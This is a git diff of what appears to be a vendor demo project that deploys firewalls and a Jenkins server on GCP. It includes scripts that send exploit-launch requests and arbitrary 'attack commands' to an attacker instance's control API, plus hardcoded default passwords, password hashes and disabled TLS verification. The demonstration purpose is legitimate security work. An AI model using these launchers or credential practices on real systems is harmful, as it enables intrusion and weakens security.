Retruns result of call. Will return response for codes between 200 and 400. + If 200 response code is required check value in response + """ + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + + try: + r = requests.get(call, headers = headers, verify=False, timeout=5) + r.raise_for_status() + except requests.exceptions.HTTPError as errh: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + ''' + logger.debug("DeployRequestException Http Error:") + raise DeployRequestException("Http Error:") + except requests.exceptions.ConnectionError as errc: + logger.debug("DeployRequestException Connection Error:") + raise DeployRequestException("Connection Error") + except requests.exceptions.Timeout as errt: + logger.debug("DeployRequestException Timeout Error:") + raise DeployRequestException("Timeout Error") + except requests.exceptions.RequestException as err: + logger.debug("DeployRequestException RequestException Error:") + raise DeployRequestException("Request Error") + else: + return r + + +class DeployRequestException(Exception): + pass + +def walkdict(dict, match): + """ + Finds a key in a dict or nested dict and returns the value associated with it + :param d: dict or nested dict + :param key: key value + :return: value associated with key + """ + for key, v in dict.items(): + if key == match: + jobid = v + return jobid + elif isinstance(v, OrderedDict): + found = walkdict(v, match) + if found is not None: + return found + + + +def update_fw(fwMgtIP, api_key): + """ + Applies latest AppID, Threat and AV updates to firewall after launch + :param fwMgtIP: Firewall management IP + :param api_key: API key + + """ + # # Download latest applications and threats + + type = "op" + cmd = "" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid = 0 + jobid = '' + key = 'job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete ") + completed = 1 + print("Download latest Applications and Threats update") + status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + # Install latest content update + type = "op" + cmd = "latestno" + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + getjobid = 0 + jobid = '' + key = 'job' + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP Install Complete ") + completed = 1 + print("Install latest Applications and Threats update") + status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + + # Download latest anti-virus update without committing + getjobid = 0 + jobid = '' + type = "op" + cmd = "" + key = 'job' + while getjobid == 0: + try: + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) + r = send_request(call) + tree = ET.fromstring(r.text) + logger.debug('Got response for show job {}'.format(r.text)) + if tree.attrib['status'] == 'success': + try: + if (tree[0][0][5].text == 'FIN'): + logger.info("AV install Status Complete ") + completed = 1 + else: + status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + + +def getApiKey(hostname, username, password): + + """ + Generates a Paloaltonetworks api key from username and password credentials + :param hostname: Ip address of firewall + :param username: + :param password: + :return: api_key API key for firewall + """ + + + call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) + + api_key = "" + while True: + try: + # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read() + response = send_request(call) + + + except DeployRequestException as updateerr: + logger.info("No response from FW. Wait 20 secs before retry") + time.sleep(10) + continue + + else: + api_key = ET.XML(response.content)[0][0].text + logger.info("FW Management plane is Responding so checking if Dataplane is ready") + logger.debug("Response to get_api is {}".format(response)) + return api_key + + +def getFirewallStatus(fwIP, api_key): + fwip = fwIP + + """ + Gets the firewall status by sending the API request show chassis status. + :param fwMgtIP: IP Address of firewall interface to be probed + :param api_key: Panos API key + """ + + url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) + # Send command to fw and see if it times out or we get a response + logger.info("Sending command 'show chassis status' to firewall") + try: + response = requests.get(url, verify=False, timeout=10) + response.raise_for_status() + except requests.exceptions.Timeout as fwdownerr: + logger.debug("No response from FW. So maybe not up!") + return 'no' + # sleep and check again? + except requests.exceptions.HTTPError as fwstartgerr: + ''' + Firewall may return 5xx error when rebooting. Need to handle a 5xx response + raise_for_status() throws HTTPError for error responses + ''' + logger.infor("Http Error: {}: ".format(fwstartgerr)) + return 'cmd_error' + except requests.exceptions.RequestException as err: + logger.debug("Got RequestException response from FW. So maybe not up!") + return 'cmd_error' + else: + logger.debug("Got response to 'show chassis status' {}".format(response)) + + resp_header = ET.fromstring(response.content) + logger.debug('Response header is {}'.format(resp_header)) + + if resp_header.tag != 'response': + logger.debug("Did not get a valid 'response' string...maybe a timeout") + return 'cmd_error' + + if resp_header.attrib['status'] == 'error': + logger.debug("Got an error for the command") + return 'cmd_error' + + if resp_header.attrib['status'] == 'success': + # The fw responded with a successful command execution. So is it ready? + for element in resp_header: + if element.text.rstrip() == 'yes': + logger.info("FW Chassis is ready to accept configuration and connections") + return 'yes' + else: + logger.info("FW Chassis not ready, still waiting for dataplane") + time.sleep(10) + return 'almost' + + +def update_status(key, value): + """ + For tracking purposes. Write responses to file. + :param key: + :param value: + :return: + """ + global status_output + + if type(status_output) is not dict: + logger.info('Creating new status_output object') + status_output = dict() + + if key is not None and value is not None: + status_output[key] = value + + # write status to file to future tracking + write_status_file(status_output) + + +def write_status_file(message_dict): + """ + Writes the deployment state to a dict and outputs to file for status tracking + """ + try: + message_json = json.dumps(message_dict) + with open('deployment_status.json', 'w+') as dpj: + dpj.write(message_json) + + except ValueError as ve: + logger.error('Could not write status file!') + print('Could not write status file!') + sys.exit(1) + + + + +def getServerStatus(IP): + """ + Gets the server status by sending an HTTP request and checking for a 200 response code + + """ + global gcontext + + call = ("http://" + IP + "/") + logger.info('URL request is {}'.format(call)) + # Send command to fw and see if it times out or we get a response + count = 0 + max_count = 18 + while True: + if count < max_count: + time.sleep(10) + try: + count = count + 1 + r = send_request(call) + except DeployRequestException as e: + logger.debug("Got Invalid response".format(e)) + else: + logger.info('Jenkins Server responded with HTTP 200 code') + return 'server_up' + else: + break + return 'server_down' + + +def apply_tf(working_dir, vars, description): + + """ + Handles terraform operations and returns variables in outputs.tf as a dict. + :param working_dir: Directory that contains the tf files + :param vars: Additional variables passed in to override defaults equivalent to -var + :param description: Description of the deployment for logging purposes + :return: return_code - 0 for success or other for failure + outputs - Dictionary of the terraform outputs defined in the outputs.tf file + + """ + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # Class Terraform uses subprocess and setting capture_output to True will capture output + capture_output = kwargs.pop('capture_output', False) + + if capture_output is True: + stderr = subprocess.PIPE + stdout = subprocess.PIPE + else: + # if capture output is False, then everything will essentially go to stdout and stderrf + stderr = sys.stderr + stdout = sys.stdout + + start_time = time.asctime() + print('Starting Deployment at {}\n'.format(start_time)) + + # Create Bootstrap + + tf = Terraform(working_dir=working_dir) + + tf.cmd('init') + if run_plan: + + # print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output, + skip_plan = True, **kwargs) + outputs = tf.output() + + logger.debug('Got Return code {} for deployment of {}'.format(return_code, description)) + + return (return_code, outputs) + + + +def main(username, password, GCP_region, Billing_Account ): + + """ + Main function + :param username: + :param password: + :param rg_name: Resource group name prefix + :param azure_region: Region + :return: + """ + username = username + password = password + # TODO maybe use a zone lookup but for now use region-B + GCP_Zone = GCP_region + '-b' + + + + + + WebInDeploy_vars = { + 'GCP_Zone': GCP_Zone, + 'GCP_Region': GCP_region, + 'Billing_Account': Billing_Account, + 'Admin_Username': username, + 'Admin_Password': password + } + + WebInFWConf_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + kwargs = {"auto-approve": True} + + # + # Build Infrastructure + # + # + + return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy') + + logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code)) + + + update_status('web_in_deploy_output', web_in_deploy_output) + if return_code == 0: + update_status('web_in_deploy_status', 'success') + albDns = web_in_deploy_output['ALB-DNS']['value'] + nlbDns = web_in_deploy_output['NATIVE-DNS']['value'] + fwMgtIP = web_in_deploy_output['FW_Mgmt_IP']['value'] + + logger.info("Got these values from output of WebInDeploy \n\n") + logger.info("AppGateway address is {}".format(albDns)) + logger.info("Firewall Mgt address is {}".format(fwMgtIP)) + + else: + logger.info("WebInDeploy failed") + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + # + # Check firewall is up and running + # + # + + api_key = getApiKey(fwMgtIP, username, password) + + while True: + err = getFirewallStatus(fwMgtIP, api_key) + if err == 'cmd_error': + logger.info("Command error from fw ") + + elif err == 'no': + logger.info("FW is not up...yet") + # print("FW is not up...yet") + time.sleep(60) + continue + + elif err == 'almost': + logger.info("MGT up waiting for dataplane") + time.sleep(20) + continue + + elif err == 'yes': + logger.info("FW is up") + break + + logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions') + time.sleep(10) + fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password) + + + logger.info("Updating firewall with latest content pack") + update_fw(fwMgtIP, api_key) + + # + # Configure Firewall + # + WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP}) + + logger.info("Applying addtional config to firewall") + + return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf') + logger.debug('Got return code {}'.format(return_code)) + if return_code == 0: + update_status('web_in_fw_conf', 'success') + logger.info("WebInFWConf succeeded") + + else: + logger.info("WebInFWConf failed") + update_status('web_in_deploy_status', 'error') + print(json.dumps(status_output)) + exit(1) + + logger.info("Commit changes to firewall") + + fw.commit() + logger.info("waiting for commit") + time.sleep(60) + logger.info("waiting for commit") + + # + # Check Jenkins + # + + logger.info('Checking if Jenkins Server is ready') + + res = getServerStatus(albDns) + + if res == 'server_up': + logger.info('Jenkins Server is ready') + logger.info('\n\n ### Deployment Complete ###') + logger.info('\n\n Connect to Jenkins Server at http://{}'.format(albDns)) + else: + logger.info('Jenkins Server is down') + logger.info('\n\n ### Deployment Complete ###') + + # dump out status to stdout + print(json.dumps(status_output)) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + parser.add_argument('-a', '--GCP_Region', help='GCP Region', required=True) + # parser.add_argument('-r', '--GCP_Zone', help='GCP Zone', required=True) + parser.add_argument('-m', '--Billing_Account', help='Billing Account', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + # GCP_Zone = args.GCP_Zone + GCP_Region = args.GCP_Region + Billing_Account = args.Billing_Account + + main(username, password, GCP_Region, Billing_Account) diff --git a/gcp/Jenkins_proj-master/destroy.py b/gcp/Jenkins_proj-master/destroy.py new file mode 100644 index 00000000..a314e0d1 --- /dev/null +++ b/gcp/Jenkins_proj-master/destroy.py @@ -0,0 +1,101 @@ +#!/usr/bin/env python3 +""" +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +# Author: Justin Harris jharris@paloaltonetworks.com + +Usage: +git +python destroy.py + +""" + +import argparse +import logging + +from python_terraform import Terraform + +logger = logging.getLogger() +handler = logging.StreamHandler() +formatter = logging.Formatter('%(levelname)-8s %(message)s') +handler.setFormatter(formatter) +logger.addHandler(handler) +logger.setLevel(logging.INFO) + + +def main(username, password): + username = username + password = password + + WebInDeploy_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + WebInBootstrap_vars = { + 'Admin_Username': username, + 'Admin_Password': password + } + + albDns = '' + nlbDns = '' + fwMgt = '' + + # Set run_plan to TRUE is you wish to run terraform plan before apply + run_plan = False + deployment_status = {} + kwargs = {"auto-approve": True} + + # + # Destroy Infrastructure + # + tf = Terraform(working_dir='./WebInDeploy') + rg_name = tf.output('RG_Name') + + attack_rg_name = tf.output('Attacker_RG_Name') + logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name)) + + WebInDeploy_vars.update({'RG_Name': rg_name}) + WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name}) + + if run_plan: + print('Calling tf.plan') + tf.plan(capture_output=False) + + return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs) + # return_code1 =0 + print('Got return code {}'.format(return_code1)) + + if return_code1 != 0: + logger.info("Failed to destroy build ") + + exit() + else: + + logger.info("Destroyed WebInDeploy ") + + + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Get Terraform Params') + parser.add_argument('-u', '--username', help='Firewall Username', required=True) + parser.add_argument('-p', '--password', help='Firewall Password', required=True) + + args = parser.parse_args() + username = args.username + password = args.password + + main(username, password) diff --git a/gcp/Jenkins_proj-master/gcp_login.py b/gcp/Jenkins_proj-master/gcp_login.py new file mode 100644 index 00000000..ecec1f80 --- /dev/null +++ b/gcp/Jenkins_proj-master/gcp_login.py @@ -0,0 +1,23 @@ +import os +""" +gloud_login +Runs the shell command to invoke login. +The login process creates a new browser window for interactive login. +The login process updates the gloud auth files in ~/.config/gcloud +Files updated are: + access_tokens.db + config_sentinel + credentials.db + +The login process stores credentials in sqlite3 in ~/.config/gcloud/credentials.db + +https://www.jhanley.com/google-cloud-where-are-my-credentials-stored/ + +""" + +def gcloud_login(): + cmd = 'gcloud auth login' + os.system(cmd) + +if __name__ == '__main__': + gcloud_login() diff --git a/gcp/Jenkins_proj-master/launch_attack_vector.py b/gcp/Jenkins_proj-master/launch_attack_vector.py new file mode 100644 index 00000000..dce17b39 --- /dev/null +++ b/gcp/Jenkins_proj-master/launch_attack_vector.py @@ -0,0 +1,72 @@ +#!/usr/bin/env python3 + +import requests +import argparse +from python_terraform import Terraform +import json +import sys + + +def get_terraform_outputs() -> dict: + tf = Terraform(working_dir='./WebInDeploy') + rc, out, err = tf.cmd('output', '-json') + + if rc == 0: + try: + return json.loads(out) + except ValueError as ve: + print('Could not parse terraform outputs!') + return dict() + + +def main(attack_vector: str) -> None: + + print('Attempting to launch exploit...\n') + outputs = get_terraform_outputs() + print(outputs) + if attack_vector == 'native': + print('Using native waf protected attack vector...\n') + target = outputs['NATIVE-DNS']['value'] + elif attack_vector == 'panos': + print('Using PAN-OS protected attack vector...\n') + target = outputs['ALB-DNS']['value'] + else: + print('malformed outputs!') + target = '127.0.0.1' + if 'ATTACKER_IP' not in outputs: + print('No attacker ip found in tf outputs!') + sys.exit(1) + + attacker = outputs['ATTACKER_IP']['value'] + payload = dict() + payload['attacker'] = attacker + payload['target'] = target + + headers = dict() + headers['Content-Type'] = 'application/json' + headers['Accept'] = '*/*' + + try: + resp = requests.post(f'http://{attacker}:5000/launch', data=json.dumps(payload), headers=headers) + if resp.status_code == 200: + print('Exploit Successfully Launched!\n') + print(resp.text) + sys.exit(0) + else: + print('Could not Launch Exploit!\n') + print(resp.text) + sys.exit(0) + except ConnectionRefusedError as cre: + print('Could not connect to attacker instance!') + sys.exit(1) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Launch Jenkins Attack CnC') + parser.add_argument('-c', '--vector', help='Attack Vector', required=True) + + args = parser.parse_args() + vector = args.vector + + main(vector) + diff --git a/gcp/Jenkins_proj-master/requirements.txt b/gcp/Jenkins_proj-master/requirements.txt new file mode 100644 index 00000000..ad92f262 --- /dev/null +++ b/gcp/Jenkins_proj-master/requirements.txt @@ -0,0 +1,12 @@ +google-api-core==1.11.1 +google-auth==1.6.3 +google-cloud-core==1.0.1 +google-cloud-storage==1.16.1 +google-resumable-media==0.3.2 +googleapis-common-protos==1.6.0 +pan-python==0.14.0 +pandevice==0.11.0 +python-terraform==0.10.0 +requests==2.21.0 +urllib3==1.24.2 +xmltodict==0.12.0 diff --git a/gcp/Jenkins_proj-master/send_command.py b/gcp/Jenkins_proj-master/send_command.py new file mode 100644 index 00000000..cbccbdfb --- /dev/null +++ b/gcp/Jenkins_proj-master/send_command.py @@ -0,0 +1,63 @@ +#!/usr/bin/env python3 + +import requests +import argparse +from python_terraform import Terraform +import json +import sys + + +def get_terraform_outputs() -> dict: + tf = Terraform(working_dir='./WebInDeploy') + rc, out, err = tf.cmd('output', '-json') + + if rc == 0: + try: + return json.loads(out) + except ValueError as ve: + print('Could not parse terraform outputs!') + return dict() + + +def main(cli: str) -> None: + + print('Attempting to launch exploit...\n') + outputs = get_terraform_outputs() + + attacker = outputs['ATTACKER_IP']['value'] + payload = dict() + payload['cli'] = cli + + headers = dict() + headers['Content-Type'] = 'application/json' + headers['Accept'] = '*/*' + + try: + resp = requests.post(f'http://{attacker}:5000/send', data=json.dumps(payload), headers=headers) + if resp.status_code == 200: + print('Command Successfully Executed!\n') + print(resp.text) + sys.exit(0) + else: + print('Could not Execute Command!\n') + print(resp.text) + sys.exit(0) + except ConnectionRefusedError as cre: + print('Could not connect to attacker instance!') + sys.exit(1) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Send Jenkins Attack Command') + parser.add_argument('-c', '--cli', help='Attack Command', required=True) + parser.add_argument('-m', '--manual_cli', help='Manual Attack Command', required=False) + + args = parser.parse_args() + cli = args.cli + mcli = args.manual_cli + + if mcli is not None and mcli != '': + main(mcli) + else: + main(cli) + diff --git a/gcp/adv-peering-with-lbnh/README.md b/gcp/adv-peering-with-lbnh/README.md new file mode 100644 index 00000000..f2a711cb --- /dev/null +++ b/gcp/adv-peering-with-lbnh/README.md @@ -0,0 +1,73 @@ +## 4 x VM-Series / 2 x Spoke VPCs via Advanced Peering and Load Balancer as Next Hop +Terraform creates 4 VM-Series firewalls that secure ingress/egress/east-west traffic for 2 spoke VPCs. The spoke VPCs are connected (via VPC Peering and Load Balancer as Next Hop) to the VM-Series. After the build completes, several manual changes must be performed to enable transitive routing. The manual changes are required since they cannot be performed through Terraform, yet. + +### Overview +* 8 x VPCs (ilb-mgmt,ilb-untust,ilb-trust,mgmt, untrust, trust, spoke1, & spoke2) with relevant peering connections +* 4 x VM-Series (BYOL / Bundle1 / Bundle2) +* 2 x Ubuntu VM in spoke1 VPC (install Apache during creation) +* 1 x Ubuntu VM in spoke2 VPC +* 1 x GCP Public Load Balancer (VM-Series as backend) +* 1 x GCP Internal Load Balancer (spoke1 VM's as backend) +* 1 x GCP Internal Load Balancer (VM-Series firewall 3 & 4 as backend) +* 2 x GCP Storage Bucket for VM-Series bootstrapping (random string appended to bucket name for global uniqueness) +
+

+ +

+ + +### Prerequistes +1. Terraform +2. Access to GCP Console + +After deployment, the firewalls' username and password are: + * **Username:** paloalto + * **Password:** Pal0Alt0@123 + +### Deployment +1. Download the **adv-peering-with-lbnh** repo to the machine running the build +2. In an editor, open **variables.tf** and set values for the following variables + +| Variable | Description | +| :------------- | :------------- | +| `main_project` | Project ID for the VM-Series, VM-Series VPCs, GCP storage bucket, & public load balancer. | +| `main_project_auth_file` | Authentication key file for main_project | +| `spoke1_project` | Project ID for spoke1 VMs, VPC, & internal load balancer | +| `spoke1_project_auth_file`| Authentication key file for spoke1_project | +| `spoke2_project` | Project ID for spoke2 VM & VPC | +| `spoke2_project_auth_file` | Authentication key file for spoke2_project | +| `ubuntu_ssh_key` | Public key used to authenticate to Ubuntu VMs (**user must be ubuntu**) | +| `vmseries_image` | Uncomment the VM-Series license you want to deploy | + +3. Download project authenication key files to the main directory of the terraform build. +

+ +

+ +4. Execute Terraform +``` +$ terraform init +$ terraform plan +$ terraform apply +``` + +5. After deployment finishes, for EACH PEER, enable **Import custom routes** & **Export custom routes** + +

+ +

+ +6. Remove default GCP VPC route for spoke1-vpc, spoke2-vpc, & trust-vpc + +

+ +

+ +7. From Terraform output, go to `GLB-ADDRESS = http://` in a web browser. NOTE: IT MAY TAKE SEVERAL MINUTES FOR SPOKE1 VMs TO FULLY INSTALL APACHE & PHP SETUP. +

+ +

+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files/authcodes b/gcp/adv-peering-with-lbnh/bootstrap_files/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/adv-peering-with-lbnh/bootstrap_files/bootstrap.xml b/gcp/adv-peering-with-lbnh/bootstrap_files/bootstrap.xml new file mode 100644 index 00000000..c9d7adda --- /dev/null +++ b/gcp/adv-peering-with-lbnh/bootstrap_files/bootstrap.xml @@ -0,0 +1,1068 @@ + + + + + + + + yes + + + $1$omtpasik$JVuMCKVuxaIHBIkdrbR4k. + + + + + yes + + + $1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ. + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + yes + + + + + no + + + + + no + + + yes + + 1460 + + no + + + + + + + no + + + + + no + + + + + no + + + yes + + 1460 + + no + + mgmt-profile + + + + + + + + 3 + 5 + wait-recover + + + + + yes + yes + yes + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 10.10.1.0/24 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 10.10.2.0/24 + + + + + + + + + + + + + updates.paloaltonetworks.com + + + + + download-and-install + 15 + + + + + + + download-and-install + 30 + + + + + US/Pacific + + yes + yes + + vm-series + + + 208.67.222.222 + 208.67.220.220 + + + + + yes + no + yes + no + + + yes + + no + + THIS IS A DEMO DEPLOYMENT +DO NOT USE FOR PRODUCTION + + + + yes + + + FQDN + + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 22 + + + + + + + 221 + + + + + + + 222 + + + + + + + 223 + + + + + + + + + + + + + + + any + + + any + + + any + + + any + + + any + + + any + + + ping + + + any + + + any + + yes + yes + allow + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + any + + + service-http + service-https + + + any + + yes + yes + allow + + + + trust-zone + + + untrust-zone + + + any + + + any + + + any + + + any + + + ssh + + + any + + + any + + yes + yes + allow + no + If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222. + + + + trust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + any + + + any + + yes + yes + allow + + + + untrust-zone + + + trust-zone + + + any + + + any + + + any + + + any + + + any + + + application-default + + + any + + yes + yes + allow + + + + + + + + + + ethernet1/2 + + + + + untrust-zone + + + untrust-zone + + + any + + + any + + service-http + ipv4 + no + + spoke1-intlb + 80 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + untrust-zone + + + untrust-zone + + + any + + + any + + service-tcp-221 + ipv4 + + spoke1-vm1 + 22 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + untrust-zone + + + untrust-zone + + + any + + + any + + service-tcp-222 + ipv4 + + spoke1-vm2 + 22 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + untrust-zone + + + untrust-zone + + + any + + + any + + tcp-223 + ipv4 + + spoke2-vm + 22 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + trust-zone + + + trust-zone + + + any + + + any + + any + ipv4 + + + + + + ethernet1/1 + + + + + untrust-zone + + + trust-zone + + + any + + + any + + any + ipv4 + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + + + + any + + + any + + + critical + + any + client + any + disable + + + + + + + any + + + any + + + high + + any + client + any + disable + + + + + + + any + + + any + + + medium + + any + client + any + disable + + + + + + + any + + + any + + + critical + + any + server + any + disable + + + + + + + any + + + any + + + high + + any + server + any + disable + + + + + + + any + + + any + + + medium + + any + server + any + disable + + + + + + + + + + + + + WW's profile + + + +
